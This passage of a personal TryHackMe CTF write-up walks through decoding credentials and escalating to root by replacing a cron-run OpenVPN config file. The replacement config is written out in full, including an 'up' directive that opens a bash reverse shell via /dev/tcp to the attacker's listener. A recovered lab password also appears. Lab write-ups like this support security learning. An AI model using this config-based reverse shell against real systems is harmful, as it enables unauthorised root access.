ChrisPritchard/ctf-writeups/tryhackme/laxctf.md

 A bit of experimenting revealed the solution: reverse -> from base64 * 16 (yes, decode from base64 16 times) which finally gave:

     king:tryh@ckm3w4sH3r3

+After this, ssh'ing onto the box as King, even moar enumeration.
+The PATH variable looked suspicious, along with root's cronjob that ran `bash run.sh`.
+I tried replacing bash via exploiting the fact that PATH appeared to include king's home directory subfolders, but that didn't work.

+More help pointed me to a suspicious file in /home that I had previous ignored as some sort of weird artefact: one thing about this room is that its a bit CTF-ey, not real worldey, if that makes sense.
+Basically there is an tryhackme.ovpn file in the home dir, and its being run by run on a shedule, likely as part of the `run.sh` the cronjob is invoking.

+Well, there is an exploit via ovpn files: https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da

+I replaced the ovpn's content with:

+    remote 3.104.196.208:1194
+    dev null
+    script-security 2
+    up "/bin/bash -c '/bin/bash -i > /dev/tcp/10.10.162.148/4444 0<&1 2>&1&'"

+With the first IP Port above being the IP Port I use when connecting to TryHackMe (just there to make the connection valid), and the second IP Port being my attacker machine, where I set up a nc listener.

+A root shell popped momentarily.
+A bit silly, really.